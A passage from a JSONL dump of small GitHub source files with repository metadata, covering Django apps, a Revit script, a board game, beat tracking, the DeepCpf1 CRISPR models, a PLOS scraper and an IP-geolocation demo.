])\n\n print(str(i)+\"/2615\")\n print(\"\\n\")\n i+=1","repo_name":"lucasdellasala/vtex-order-extractor","sub_path":"paso3.py","file_name":"paso3.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17337419916","text":"from Euler.Solution import Solution\nimport Euler.Math as EM\n\ndef logic():\n factorial = 1\n for i in range(1, 100 + 1): factorial *= i\n else:\n summed = str(factorial)\n return sum(map(int, summed))\n\nsolution = Solution(value = 648, placement = None)\nsolution.logic = logic\nsolution.run()\n","repo_name":"Parad0x13/ProjectEuler","sub_path":"Solutions/0020_Solved.py","file_name":"0020_Solved.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1964174723","text":"import modi_plus\nfrom playscii import GameManager, GameObject\nfrom math import sin, radians\n\n\nclass BrushManager(GameManager):\n def __init__(self, size, imu, button):\n super().__init__(size)\n self.cursor = Brush(pos=(size[0] // 2, size[1] // 2), render=\"o\")\n self.imu = imu\n self.button = button\n\n def setup(self):\n self.add_object(self.cursor)\n\n def update(self):\n h, w = self.height // 2, self.width // 2\n self.cursor.y = h - h * sin(radians(-self.imu.roll))\n self.cursor.x = w - w * sin(radians(-self.imu.pitch))\n if self.button.pressed:\n self.add_object(Brush((self.cursor.x, self.cursor.y), \"x\"))\n\n\nclass Brush(GameObject):\n def update(self):\n pass\n\n\nif __name__ == \"__main__\":\n bundle = modi_plus.MODIPlus()\n canvas = BrushManager((100, 20), bundle.imus[0], bundle.buttons[0])\n canvas.start()\n","repo_name":"LUXROBO/pymodi-plus","sub_path":"examples/creation_examples/brush.py","file_name":"brush.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72084933287","text":"#!/usr/bin/python3\n\nimport requests\n\ndef get_location(ip_address):\n response = requests.get(f'https://ipapi.co/{ip_address}/json/')\n data = response.json()\n return data\n\n# Get your public IP address\nip = requests.get('https://api.ipify.org').text\n\n# Get location information based on IP address\nlocation_data = get_location(ip)\n\n# Extract relevant information\ncity = location_data['city']\nregion = location_data['region']\ncountry = location_data['country_name']\n\n# Print location information\nprint(\"Your location:\")\nprint(\"City:\", city)\nprint(\"Region:\", region)\nprint(\"Country:\", country)\n","repo_name":"mohamedashraf56/Embedded-Linux-Tasks","sub_path":"1-Python/Session 3/my location.py","file_name":"my location.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9166227436","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('attendance', '0006_regularofficetime_remarks'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='regularofficetime',\n name='entry_category',\n field=models.CharField(max_length=40, default=1, choices=[('1', 'Regular'), ('2', 'Execption')]),\n preserve_default=False,\n ),\n 
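The Project Euler #20 record above builds 100! with an explicit loop before summing digits; math.factorial collapses it to one expression with the same answer:

import math

def factorial_digit_sum(n):
    # sum of the decimal digits of n!
    return sum(map(int, str(math.factorial(n))))

assert factorial_digit_sum(100) == 648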
]\n","repo_name":"tifat58/hrmis","sub_path":"attendance/migrations/0007_regularofficetime_entry_category.py","file_name":"0007_regularofficetime_entry_category.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15565441486","text":"import urllib2\n\nfrom connector import Connector\n\nif __name__ == '__main__':\n domain = 'ftp.freebsd.org'\n path = '/pub/FreeBSD/'\n protocol = input('Connecting to {}. Which Protocol to use? (0-http, 1-ftp):'.format(domain))\n\n connection = Connector(protocol)\n try:\n content = connection.read(domain, path)\n except urllib2.URLError as e:\n print('Can not access resource with this method')\n else:\n print(connection.parse(content))\n","repo_name":"huyngopt1994/Common_pattern_python","sub_path":"AbstractFactory/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19487181838","text":"import tkinter as tk\n\nfrom Link_Line import Link_Line\n\nclass DragDropMixin:\n def __init__(self, parent, links):\n self.parent = parent\n self.links = links\n self.bind(\"\", self.on_start)\n self.bind(\"\", self.on_drag)\n self.bind(\"\", self.on_release)\n \n def on_start(self, event):\n widget = event.widget\n widget.startX = event.x\n widget.startY = event.y\n if len(self.links) > 0:\n for link in self.links:\n if self is link.start:\n end_x, end_y = link.end.get_coordinates()\n self.parent.coords(link.value, self.winfo_x()+50, self.winfo_y()+50, end_x+50, end_y+50)\n if self is link.end:\n start_x, start_y = link.start.get_coordinates()\n self.parent.coords(link.value, start_x+50, start_y+50, self.winfo_x()+50, self.winfo_y()+50)\n \n def on_drag(self, event):\n widget = event.widget\n x = widget.winfo_x() - widget.startX + event.x\n y = widget.winfo_y() - widget.startY + event.y\n widget.place(x=x, y=y)\n if len(self.links) > 0:\n for link in self.links:\n if self is link.start:\n end_x, end_y = link.end.get_coordinates()\n self.parent.coords(link.value, self.winfo_x()+50, self.winfo_y()+50, end_x+50, end_y+50)\n if self is link.end:\n start_x, start_y = link.start.get_coordinates()\n self.parent.coords(link.value, start_x+50, start_y+50, self.winfo_x()+50, self.winfo_y()+50)\n\n def on_release(self, event):\n widget = event.widget\n x = self.winfo_x()\n y =self.winfo_y()\n \n\nclass Node_Frame(DragDropMixin, tk.Frame):\n def __init__(self, parent, node, image_path, node_name, links = []):\n self.parent = parent\n self.links = links\n self.node = node\n tk.Frame.__init__(self, self.parent)\n super().__init__(self.parent, self.links)\n self.label = tk.Label(self, text=node_name, font=(\"Helvetica\", 12))\n self.canvas = tk.Canvas(self, width=100, height=100, bd=0, highlightthickness=0)\n self.canvas.pack()\n image = tk.PhotoImage(file=image_path)\n self.image = image\n #place the image in the center of the canvas\n self.canvas.create_image(50, 50, image=image)\n self.label.pack()\n self.pack()\n\n def get_coordinates(self):\n return self.winfo_x(), self.winfo_y()\n\n","repo_name":"AlecMParfitt/net_sim","sub_path":"Node_Frame.py","file_name":"Node_Frame.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"171838477","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.sitemaps.views import 
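The AbstractFactory record above still imports Python 2's urllib2 and catches urllib2.URLError, so it cannot run on Python 3. The equivalent calls live in urllib.request and urllib.error; a minimal Python 3 sketch of the same fetch-or-report flow:

from urllib.request import urlopen
from urllib.error import URLError

def fetch(url):
    try:
        with urlopen(url, timeout=10) as resp:
            return resp.read()
    except URLError as err:
        print("Can not access resource with this method:", err)
        return None

# fetch("http://ftp.freebsd.org/pub/FreeBSD/")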
sitemap\nfrom blog.sitemaps import StaticViewSitemap, BlogSitemap\n\nsitemaps = {\n    'static': StaticViewSitemap,\n    'blog': BlogSitemap,\n}\n\nurlpatterns = [\n    url(r'^admin/', include(admin.site.urls)),\n    url(r'^markdown/', include(\"django_markdown.urls\")),\n    url(r'^sitemap\\.xml$', sitemap, {'sitemaps': sitemaps},\n        name='django.contrib.sitemaps.views.sitemap'),\n    url(r'', include('blog.urls')),\n]\n","repo_name":"jyotman/personal-blog","sub_path":"mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"27265967754","text":"# coding: utf8\n\nfrom pyrevit import revit, UI, DB\nfrom pyrevit import script, forms\nimport rpw\nimport time\nfrom Autodesk.Revit.DB import Transaction\n\nstart = time.time()\n\n\n__title__ = \"0.31 Wert_Schreiben_Raum\"\n__doc__ = \"\"\"Write value\"\"\"\n__author__ = \"Menghui Zhang\"\n\nlogger = script.get_logger()\noutput = script.get_output()\n\nuidoc = rpw.revit.uidoc\ndoc = rpw.revit.doc\n\nfrom pyIGF_logInfo import getlog\ngetlog(__title__)\n\n\n# MEP spaces from the current project\nspaces_collector = DB.FilteredElementCollector(doc) \\\n    .OfCategory(DB.BuiltInCategory.OST_MEPSpaces)\nspaces = spaces_collector.ToElementIds()\n\nlogger.info(\"{} MEP spaces selected\".format(len(spaces)))\n\nPara = rpw.ui.forms.TextInput('Parameter: ', default = \"Parameter\")\n\ndef get_value(param):\n    \"\"\"Converts values from internal Revit units to project units\"\"\"\n\n    value = revit.query.get_param_value(param)\n\n    try:\n        unit = param.DisplayUnitType\n\n        value = DB.UnitUtils.ConvertFromInternalUnits(\n            value,\n            unit)\n\n    except Exception as e:\n        pass\n\n    return value\n\ntable = []\nwhile Para != 'Parameter':\n\n    t = Transaction(doc, 'Transfer')\n    t.Start()\n\n\n    Wert = rpw.ui.forms.TextInput('Value: ', default = \"Wert\")\n\n    for Space in spaces_collector:\n        name = get_value(Space.LookupParameter('Name'))\n        nummer = get_value(Space.LookupParameter('Nummer'))\n        para = Space.LookupParameter(Para)\n        para.SetValueString(str(Wert))\n\n    t.Commit()\n\n\n\n    Para = rpw.ui.forms.TextInput('Parameter: ', default = \"Parameter\")\n\n\ntotal = time.time() - start\nlogger.info(\"total time: {} {}\".format(total, 100 * \"_\"))\n","repo_name":"MenghuiZhang/pyIGF","sub_path":"pyIGF.tab/Allgemein.panel/All_1.stack/Parameter.pulldown/alt/Werte schreiben.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"74516051686","text":"class _player:\n    def __init__(self, player, gobbs, color, scolor, modes):\n        self.player = player\n        self.gobbs = gobbs\n        self.color = color\n        self.scolor = scolor\n        self.modes = modes\n\n    \n_win_lines = {\n    \"a\": ['a1', 'a2', 'a3'],\n    \"b\": ['b1', 'b2', 'b3'],\n    \"c\": ['c1', 'c2', 'c3'],\n    \"one\": ['a1', 'b1', 'c1'],\n    \"two\": ['a2', 'b2', 'c2'],\n    \"three\": ['a3', 'b3', 'c3'],\n    \"backslash\": ['a1', 'b2', 'c3'],\n    \"slash\": ['a3', 'b2', 'c1']\n}\n\n\n# GobbletGobblers('佐藤', '田中', 'red', ' ')\nclass GobbletGobblers:\n    def __init__(self, senkou_player, koukou_player, empty_board_text):\n\n        self.empty_board_text = str(empty_board_text)\n        self.sen = _player(senkou_player, list('ssmmbb'), 'Red', 'r', ['p'])\n        self.kou = _player(koukou_player, list('ssmmbb'), 'Blue', 'b', ['p'])\n\n        self.turn = 1\n\n        self.now_player = self.sen\n\n        self.won = False\n        self.winner = None\n\n        
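urls.py above wires StaticViewSitemap into the sitemap view; blog/sitemaps.py itself is not shown. On recent Django a static-view sitemap is typically a Sitemap subclass that reverses named URLs; a hedged sketch of what it likely contains, with the url names purely illustrative:

from django.contrib import sitemaps
from django.urls import reverse  # django.core.urlresolvers on old Django

class StaticViewSitemap(sitemaps.Sitemap):
    priority = 0.5
    changefreq = "weekly"

    def items(self):
        return ["home", "about"]  # named url patterns (assumed)

    def location(self, item):
        return reverse(item)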
self.board = {\n \"a1\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"a2\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"a3\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"b1\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"b2\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"b3\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"c1\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"c2\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n },\n \"c3\": {\n \"t\": self.empty_board_text,\n \"b\": None,\n \"m\": None,\n \"s\": None\n }\n }\n\n def _win_check(self):\n for key in _win_lines.keys():\n if all([self.board[_key]['t'].startswith('b') for _key in _win_lines[key]]):\n self.won = True\n self.kou.win_line = key\n self.winner = self.kou\n return\n if all([self.board[_key]['t'].startswith('r') for _key in _win_lines[key]]):\n self.won = True\n self.sen.win_line = key\n self.winner = self.sen\n return\n\n def _powerful(self, place):\n gobbs = list(dict.fromkeys(self.now_player.gobbs))\n board_place = self.board[place]\n\n if board_place['t'] == self.empty_board_text:\n return gobbs\n\n elif board_place['t'].endswith('s'):\n try:\n gobbs.remove('s')\n except:\n pass\n return gobbs\n\n elif board_place['t'].endswith('m'):\n try:\n gobbs.remove('s')\n except:\n pass\n try:\n gobbs.remove('m')\n except:\n pass\n return gobbs\n\n def choices_put(self):\n not_big_places = [key for key in self.board.keys() if self.board[key]['b'] is None]\n a1 = None if 'a1' not in not_big_places else self._powerful('a1')\n a2 = None if 'a2' not in not_big_places else self._powerful('a2')\n a3 = None if 'a3' not in not_big_places else self._powerful('a3')\n b1 = None if 'b1' not in not_big_places else self._powerful('b1')\n b2 = None if 'b2' not in not_big_places else self._powerful('b2')\n b3 = None if 'b3' not in not_big_places else self._powerful('b3')\n c1 = None if 'c1' not in not_big_places else self._powerful('c1')\n c2 = None if 'c2' not in not_big_places else self._powerful('c2')\n c3 = None if 'c3' not in not_big_places else self._powerful('c3')\n\n r = {\n \"a1\": a1,\n \"a2\": a2,\n \"a3\": a3,\n \"b1\": b1,\n \"b2\": b2,\n \"b3\": b3,\n \"c1\": c1,\n \"c2\": c2,\n \"c3\": c3\n }\n return r\n\n def put(self, place, size):\n self.board[place][size] = self.now_player.scolor\n self.board[place]['t'] = self.now_player.scolor + size\n self._win_check()\n self.now_player.gobbs.remove(size)\n\n if self.now_player.scolor == 'r':\n self.sen = self.now_player\n else:\n self.kou = self.now_player\n\n players_gobbs = [key for key in self.board.keys() if self.board[key]['t'].startswith('b')]\n if len(players_gobbs) > 0 and 'm' not in self.kou.modes:\n self.kou.modes.append('m')\n elif len(players_gobbs) == 0 and 'm' in self.kou.modes:\n self.kou.modes.remove('m')\n\n players_gobbs = [key for key in self.board.keys() if self.board[key]['t'].startswith('r')]\n if len(players_gobbs) > 0 and 'm' not in self.sen.modes:\n self.sen.modes.append('m')\n elif len(players_gobbs) == 0 and 'm' in self.sen.modes:\n self.sen.modes.remove('m')\n\n self.now_player = self.kou if self.now_player.scolor == 'r' else self.sen\n\n if not self.won:\n self.turn += 1\n\n def choices_move_from(self):\n players_gobbs = [key for key in 
self.board.keys() if self.board[key]['t'].startswith(self.now_player.scolor)]\n return players_gobbs\n\n def choices_move_to(self, from_):\n not_big_places = [key for key in self.board.keys() if self.board[key]['b'] is None]\n if self.board[from_]['t'].endswith('s'):\n return [key for key in not_big_places if self.board[key]['t'] == self.empty_board_text]\n elif self.board[from_]['t'].endswith('m'):\n return [key for key in not_big_places if self.board[key]['m'] is None and self.board[key]['b'] is None]\n elif self.board[from_]['t'].endswith('b'):\n return not_big_places\n\n def move(self, from_, to):\n move_gobb = self.board[from_]['t']\n if move_gobb.endswith('s'):\n self.board[from_]['s'] = None\n self.board[from_]['t'] = self.empty_board_text\n \n self._win_check()\n \n elif move_gobb.endswith('m'):\n self.board[from_]['m'] = None\n self.board[from_]['t'] = self.board[from_]['s'] + 's' if not self.board[from_]['s'] is None else self.empty_board_text\n \n self._win_check()\n \n elif move_gobb.endswith('b'):\n self.board[from_]['b'] = None\n if not self.board[from_]['m'] is None:\n self.board[from_]['t'] = self.board[from_]['m'] + 'm'\n elif not self.board[from_]['s'] is None:\n self.board[from_]['t'] = self.board[from_]['s'] + 's'\n else:\n self.board[from_]['t'] = self.empty_board_text\n \n self._win_check()\n \n self.board[to]['b'] = move_gobb[0]\n self.board[to]['t'] = move_gobb\n if not self.won:\n self._win_check()\n \n if self.now_player.scolor == 'r':\n self.sen = self.now_player\n else:\n self.kou = self.now_player\n\n players_gobbs = [key for key in self.board.keys() if self.board[key]['t'].startswith('b')]\n if len(players_gobbs) > 0 and 'm' not in self.kou.modes:\n self.kou.modes.append('m')\n elif len(players_gobbs) == 0 and 'm' in self.kou.modes:\n self.kou.modes.remove('m')\n\n players_gobbs = [key for key in self.board.keys() if self.board[key]['t'].startswith('r')]\n if len(players_gobbs) > 0 and 'm' not in self.sen.modes:\n self.sen.modes.append('m')\n elif len(players_gobbs) == 0 and 'm' in self.sen.modes:\n self.sen.modes.remove('m')\n\n self.now_player = self.kou if self.now_player.scolor == 'r' else self.sen\n\n if not self.won:\n self.turn += 1\n","repo_name":"AomiVel/gobbletgobblers.py","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":8444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7577976066","text":"from django.shortcuts import render, redirect\nfrom .models import Favorite, Contactame\nfrom django.contrib import messages\n\n# Create your views here.\ndef Home(request):\n favorite = Favorite.objects.all().filter(is_available=True) \n \n return render(request, 'pages/home.html', {\n 'favorite': favorite,\n })\n\n\ndef register_contact(request):\n name = request.POST['name']\n email = request.POST['email']\n phone = request.POST['phone']\n message = request.POST['message']\n \n contact = Contactame.objects.create(name=name, email=email, phone=phone, message=message)\n \n messages.success(request, message=\"Me has contactado con exito!!! Te respondere a la brevedad. 
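_win_check above scans every candidate line with all(); the test is small enough to isolate. The same check on a plain board dict (same cell keys and colour prefixes as the record):

_win_lines = {
    "a": ["a1", "a2", "a3"],
    "one": ["a1", "b1", "c1"],
    "backslash": ["a1", "b2", "c3"],
}

def winning_line(board, color_prefix):
    # first line whose three cells all belong to color_prefix, else None
    for name, cells in _win_lines.items():
        if all(board[c].startswith(color_prefix) for c in cells):
            return name
    return None

board = {cell: " " for line in _win_lines.values() for cell in line}
board.update({"a1": "rb", "b2": "rm", "c3": "rs"})
print(winning_line(board, "r"))  # backslash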
😃\")\n \n return redirect('/')","repo_name":"JsArmandoCano/BunnyDesignPython","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17991036009","text":"# import madmom\r\n# # from madmom import madmom\r\n#\r\n# def rnn_beattrack(sound, sr):\r\n# # approach 2 - dbn tracker\r\n# proc = madmom.features.beats.DBNBeatTrackingProcessor(fps=100)\r\n# act = madmom.features.beats.RNNBeatProcessor()\r\n#\r\n# beat_times = proc(act)\r\n#\r\n# clicks = librosa.clicks(beat_times, sr=sr, length=len(sound))\r\n# # ipd.Audio(x + clicks, rate=sr\r\n# print(type(sound+clicks))\r\n\r\nimport librosa\r\nimport numpy as np\r\nimport sys\r\nimport scipy.signal\r\nimport matplotlib.pyplot as plt\r\n\r\ndef beat_track_dynamic(sound, sr):\r\n tempo, beat_times = librosa.beat.beat_track(sound, sr=sr, start_bpm=60, units='time')\r\n clicks = librosa.clicks(beat_times, sr=sr, length=len(sound))\r\n\r\n return sound+clicks, clicks\r\n\r\ndef plot_beats(clicks):\r\n plt.figure(figsize=(14, 5))\r\n # librosa.display.waveplot(x, alpha=0.6)\r\n plt.vlines(clicks, -1, 1, color='r')\r\n plt.ylim(-1, 1)\r\n plt.show()\r\n\r\ndef find_beats_start(clicks):\r\n clicks_indicies = scipy.signal.find_peaks(clicks)\r\n return clicks_indicies[0]\r\n\r\n\r\ndef overlay_beat_songs(song1, song2, ind1, ind2, sr=22050):\r\n if ind1 > ind2:\r\n diff = ind1 - ind2\r\n adjusted_song2 = np.concatenate([np.array([0]*diff), song2])\r\n return song1, adjusted_song2\r\n else:\r\n diff = ind2 - ind1\r\n adjusted_song1 = np.concatenate([np.array([0]*diff), song1])\r\n return adjusted_song1, song2\r\n\r\n\r\n","repo_name":"alexandrova-s/app_mashups","sub_path":"beat_tracker.py","file_name":"beat_tracker.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34910008902","text":"import numpy as np\nimport sys; \n\nfrom tensorflow.keras import backend as K\n\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import ( \n Input,\n Multiply,\n Dense,\n Dropout,\n Activation,\n Flatten,\n Convolution1D,\n AveragePooling1D\n)\n\ndef build_models():\n Seq_deepCpf1_Input_SEQ = Input(shape=(34,4))\n Seq_deepCpf1_C1 = Convolution1D(80, 5, activation='relu')(Seq_deepCpf1_Input_SEQ)\n Seq_deepCpf1_P1 = AveragePooling1D(2)(Seq_deepCpf1_C1)\n Seq_deepCpf1_F = Flatten()(Seq_deepCpf1_P1)\n Seq_deepCpf1_DO1= Dropout(0.3)(Seq_deepCpf1_F)\n Seq_deepCpf1_D1 = Dense(80, activation='relu')(Seq_deepCpf1_DO1)\n Seq_deepCpf1_DO2= Dropout(0.3)(Seq_deepCpf1_D1)\n Seq_deepCpf1_D2 = Dense(40, activation='relu')(Seq_deepCpf1_DO2)\n Seq_deepCpf1_DO3= Dropout(0.3)(Seq_deepCpf1_D2)\n Seq_deepCpf1_D3 = Dense(40, activation='relu')(Seq_deepCpf1_DO3)\n Seq_deepCpf1_DO4= Dropout(0.3)(Seq_deepCpf1_D3)\n Seq_deepCpf1_Output = Dense(1, activation='linear')(Seq_deepCpf1_DO4)\n Seq_deepCpf1 = Model(inputs=[Seq_deepCpf1_Input_SEQ], outputs=[Seq_deepCpf1_Output])\n \n DeepCpf1_Input_SEQ = Input(shape=(34,4))\n DeepCpf1_C1 = Convolution1D(80, 5, activation='relu')(DeepCpf1_Input_SEQ)\n DeepCpf1_P1 = AveragePooling1D(2)(DeepCpf1_C1)\n DeepCpf1_F = Flatten()(DeepCpf1_P1)\n DeepCpf1_DO1= Dropout(0.3)(DeepCpf1_F)\n DeepCpf1_D1 = Dense(80, activation='relu')(DeepCpf1_DO1)\n DeepCpf1_DO2= Dropout(0.3)(DeepCpf1_D1)\n DeepCpf1_D2 = Dense(40, activation='relu')(DeepCpf1_DO2)\n DeepCpf1_DO3= Dropout(0.3)(DeepCpf1_D2)\n DeepCpf1_D3_SEQ = 
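overlay_beat_songs in the beat_tracker record aligns two tracks by left-padding the later one with zeros; np.pad expresses the same thing directly. A toy-array sketch (numpy only):

import numpy as np

def align_on_first_beat(song1, song2, ind1, ind2):
    # delay the track whose first beat comes earlier so that the
    # first detected beats coincide sample-for-sample
    if ind1 > ind2:
        return song1, np.pad(song2, (ind1 - ind2, 0))
    return np.pad(song1, (ind2 - ind1, 0)), song2

a = np.array([1.0, 1.0, 1.0])  # first beat detected at sample 2 (say)
b = np.array([2.0, 2.0, 2.0])  # first beat detected at sample 0
_, y = align_on_first_beat(a, b, 2, 0)
print(y)  # [0. 0. 2. 2. 2.]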
Dense(40, activation='relu')(DeepCpf1_DO3)\n \n DeepCpf1_Input_CA = Input(shape=(1,))\n DeepCpf1_D3_CA = Dense(40, activation='relu')(DeepCpf1_Input_CA)\n DeepCpf1_M = Multiply()([DeepCpf1_D3_SEQ, DeepCpf1_D3_CA])\n \n DeepCpf1_DO4= Dropout(0.3)(DeepCpf1_M)\n DeepCpf1_Output = Dense(1, activation='linear')(DeepCpf1_DO4)\n DeepCpf1 = Model(inputs=[DeepCpf1_Input_SEQ, DeepCpf1_Input_CA], outputs=[DeepCpf1_Output])\n \n Seq_deepCpf1.load_weights('weights/Seq_deepCpf1_weights.h5')\n DeepCpf1.load_weights('weights/DeepCpf1_weights.h5')\n \n return Seq_deepCpf1, DeepCpf1\n\n\ndef run_on_seq(sequences, chromatin_acessibilities=None):\n if chromatin_acessibilities is None:\n chromatin_acessibilities = [0 for _ in sequences]\n\n Seq_deepCpf1, DeepCpf1 = build_models()\n\n SEQ, CA = PREPROCESS(sequences, chromatin_acessibilities)\n \n Seq_deepCpf1_SCORE = Seq_deepCpf1.predict([SEQ], batch_size=50, verbose=0)\n DeepCpf1_SCORE = DeepCpf1.predict([SEQ, CA], batch_size=50, verbose=0) * 3\n\n\n return Seq_deepCpf1_SCORE, DeepCpf1_SCORE\n\n\ndef PREPROCESS(sequences, chromatin_acessibilities):\n data_n = len(sequences) - 1\n SEQ = np.zeros((data_n + 1, 34, 4), dtype=int)\n CA = np.zeros((data_n + 1, 1), dtype=int)\n\n \n for j, (seq, ca) in enumerate(zip(sequences, chromatin_acessibilities)):\n for i in range(34):\n if seq[i] in \"Aa\":\n SEQ[j, i, 0] = 1\n elif seq[i] in \"Cc\":\n SEQ[j, i, 1] = 1\n elif seq[i] in \"Gg\":\n SEQ[j, i, 2] = 1\n elif seq[i] in \"Tt\":\n SEQ[j, i, 3] = 1\n\n CA[j,0] = ca*100\n\n return SEQ, CA\n\n","repo_name":"albinoknyaz/YourCRISPRguide","sub_path":"DeepCpf1.py","file_name":"DeepCpf1.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31527810026","text":"import pytest\n\nfrom geoprofielen.objects.cpt import CPT\n\ndef test_read():\n cpt = CPT()\n cpt.read(\"./tests/testdata/in/cpt.gef\")\n \n assert(cpt.name == \"DKM-227\")\n assert(cpt.x == 139081.7)\n assert(cpt.y == 446328.1)\n assert(cpt.z_top == 0.73)\n assert(cpt.z_min == -14.48)\n\n\ndef test_filter():\n cpt = CPT()\n cpt.read(\"./tests/testdata/in/cpt.gef\")\n\n layers = cpt.filter(0.2)\n assert(layers.shape == (76, 6))\n\n layers = cpt.filter(0.1)\n assert(layers.shape == (153, 6))\n\ndef test_plot():\n cpt = CPT()\n cpt.read(\"./tests/testdata/in/cpt.gef\")\n cpt.convert()\n cpt.plot(filepath=\"./tests/testdata/out\")\n\ndef test_pre_excavated_depth():\n cpt = CPT()\n cpt.read(\"./tests/testdata/in/cpt_preexcavated_depth.gef\")\n assert cpt.pre_excavated_depth == 2.0\n","repo_name":"breinbaas/geoprofielen","sub_path":"tests/test_cpt.py","file_name":"test_cpt.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38274190188","text":"from bs4 import BeautifulSoup\nfrom requests_html import HTMLSession\nfrom .base import Retriever, Meta, ArticleLink\nimport time \n\n'''\n#loop = asyncio.new_event_loop()\n#asyncio.set_event_loop(loop)\n\nif asyncio.get_event_loop().is_running(): # Only patch if needed (i.e. 
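PREPROCESS in the DeepCpf1 record one-hot encodes each base with four if-branches; an index lookup into np.eye does the same in one pass. A sketch (numpy only, same A/C/G/T channel order):

import numpy as np

BASE_INDEX = {"A": 0, "C": 1, "G": 2, "T": 3}

def one_hot(seq):
    idx = [BASE_INDEX[base] for base in seq.upper()]
    return np.eye(4, dtype=int)[idx]  # shape (len(seq), 4)

print(one_hot("ACGT"))
# [[1 0 0 0]
#  [0 1 0 0]
#  [0 0 1 0]
#  [0 0 0 1]]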
running in Notebook, Spyder, etc)\n import nest_asyncio\n nest_asyncio.apply()\nloop = asyncio.get_running_loop()\nasession = AsyncHTMLSession(loop=loop)\n'''\n\nsession = HTMLSession()\nURL = {'base':\"https://journals.plos.org\",\n 'search':\"https://journals.plos.org/plosone/search?q={}&page=1\",\n }\n\nclass PLOS(Retriever):\n\n def __init__(self) -> None:\n super().__init__(journal='plos', base_url=URL['base'], search_url=URL['search'])\n self.num_pages = 1\n self.meta = {\n 'author':'citation_author', \n 'citation_date':'citation_date',\n 'publication_date':'citation_date', \n 'doi':'citation_doi',\n 'publisher':'citation_publisher', \n 'journal':'citation_journal_title', \n 'article_type':'citation_article_type'}\n\n def get_num_pages(self, page_soup):\n nav = page_soup.find('nav',{'id':'article-pagination'})\n links = nav.find_all('a')\n if len(links) >= 2:\n self.num_pages = int(links[-2].text)\n \n def get_page_links(self, page_soup):\n article_links = []\n articles = page_soup.find_all('dt')\n for article in articles:\n doi = article.get('data-doi')\n link = article.find('a')\n uri = link.get('href')\n article_links.append(ArticleLink(title=link.text, url=self.base_url+uri, doi=doi))\n return article_links\n \n '''\n async def _asearch(self, query)->BeautifulSoup:\n self.query_url = self.get_query_url(query)\n r = await asession.get(self.query_url)\n await r.html.arender() \n time.sleep(1)\n return BeautifulSoup(r.html.html, \"lxml\")\n\n def _search(self, query)->BeautifulSoup:\n return asyncio.run(self._asearch(query))\n '''\n \n def _search(self, query)->BeautifulSoup:\n self.query_url = self.get_query_url(query)\n res = session.get(self.query_url)\n res.html.render(wait=1,sleep=1)\n html = res.html.html\n soup = BeautifulSoup(html, \"lxml\")\n return soup\n\n def get_meta(self, page_soup)->Meta:\n data = {}\n for k,v in self.meta.items():\n els = page_soup.find_all('meta',{'name':v})\n els = [el.get('content') for el in els]\n if len(els)==1:\n data.update({k:els[0]})\n else:\n data.update({k:els})\n\n # Add PDF\n try:\n link = page_soup.find('a',{'id':\"downloadPdf\"})\n data.update({'pdf':self.base_url+link.get('href')})\n except:\n print('Could not find PDF')\n\n # Add link\n link = page_soup.find('meta',{'property':'og:url'})\n data.update({'link':link.get('content')})\n return Meta(**data)\n\n def get_sections(self, soup, level=0):\n sections = soup.find_all(self.levels[level])\n if len(sections)==0 and level<4:\n return self.get_sections(soup, level+1)\n if len(sections)==0:\n return None\n if level==4:\n return [s.text for s in sections if s.text]\n else:\n out = []\n for sec in sections:\n part = {'title':sec.text, 'text':self.get_sections(sec.parent, level+1)}\n if part['text']:\n out.append(part)\n return 